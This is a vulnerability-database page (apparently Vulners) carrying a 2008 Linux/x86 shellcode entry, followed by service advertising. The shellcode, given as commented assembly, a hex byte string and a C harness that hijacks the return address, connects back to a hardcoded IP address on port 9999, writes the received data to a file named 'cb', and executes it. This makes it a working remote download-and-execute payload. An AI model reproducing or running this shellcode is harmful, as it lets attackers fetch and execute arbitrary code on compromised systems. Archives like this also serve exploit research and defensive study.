Vulners
Lucene search
linux/x86 connect back, download a file and execute 149 bytes
/*
;file download shellcode (149 bytes)
;
;connect back, download a file and execute.
;modify the name of the file and the ip address first.
;
;militan
;Advanced Defense Lab(ADL)
;
global _start
_start:
xor ecx,ecx
mul ecx
xor ebx,ebx
cdq
;socket
push eax
push byte 0x1
push byte 0x2
mov ecx,esp
inc ebx
mov al,0x66
int 0x80
mov edi,eax ;edi=sockfd
;connect,port(9999)=270f ip(140.115.53.35)=(8c.73.35.23)
push edx
push long 0x2335738c ;address *
push word 0x0f27 ;port *
mov dl,0x02
push dx ;family 1
mov ecx,esp ;adjust struct
push byte 0x10
push ecx
push edi ;sockfd
mov ecx,esp
mov bl,3
mov al,102
int 0x80
;sys_open(cb,O_WRONLY|O_CREATE|O_TRUNC[0001.0100.1000=1101],700)
xor ebx,ebx
xor ecx,ecx
push ecx
push word 0x6263 ;file name="cb"
mov ebx,esp
mov cx,0x242
mov dx,0x1c0 ;Octal
mov al,5
int 0x80
mov esi,eax ;esi=fd
;
xor ecx,ecx
mul ecx
cdq
mov dx,0x03e8 ;memory chunk=1000=0x03e8: read per time
L1:
;sys_read(socket sockfd,buf,len)
xor ebx,ebx
xor eax,eax
mov al,3
mov ebx,edi ;edi=sock fd
lea ecx,[esp-1000] ;memory chunk
int 0x80
;sys_write(fd,*buf,count)
mov ebx,esi
mov edx,eax
xor eax,eax
mov al,4
int 0x80
cmp dx,0x03e8
je L1 ;loop
CONTINUE:
;sys_close(fd)
mov ebx,esi
xor eax,eax
mov al,6
int 0x80
;execve[./cb,0]
xor ecx,ecx
mul ecx
push ecx
push word 0x6263 ;file name="cb"
mov ebx,esp
push ecx
push ebx
mov ecx,esp
mov al,0x0b
int 0x80
EXIT:
xor eax,eax
xor ebx,ebx
inc eax
int 0x80
*/
#include<stdio.h>
#include<string.h>
#include<stdlib.h>
unsigned char shellcode[]="\x31\xc9\xf7\xe1\x31\xdb\x99\x50\x6a\x01\x6a\x02\x89\xe1\x43\xb0\x66\xcd\x80"
"\x89\xc7\x52\x68\x8c\x73\x35\x23\x66\x68\x27\x0f\xb2\x02\x66\x52\x89\xe1\x6a\x10\x51\x57\x89\xe1\xb3\x03\xb0\x66\xcd\x80"
"\x31\xdb\x31\xc9\x51\x66\x68\x63\x62\x89\xe3\x66\xb9\x42\x02\x66\xba\xc0\x01\xb0\x05\xcd\x80"
"\x89\xc6\x31\xc9\xf7\xe1\x99\x66\xba\xe8\x03\x31\xdb\x31\xc0\xb0\x03\x89\xfb\x8d\x8c\x24\x18\xfc\xff\xff\xcd\x80\x89\xf3\x89\xc2\x31\xc0\xb0\x04\xcd\x80"
"\x66\x81\xfa\xe8\x03\x74\xde\x89\xf3\x31\xc0\xb0\x06\xcd\x80\x31\xc9\xf7\xe1\x51\x66\x68\x63\x62\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"
"\x31\xc0\x31\xdb\x40\xcd\x80";
void k(){
int *ret;
ret=(int *)&ret+2;
(*ret)=(int)shellcode;
}
int main (){
k();
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Aug 2008 00:00Current
7.1High risk
Vulners AI Score7.1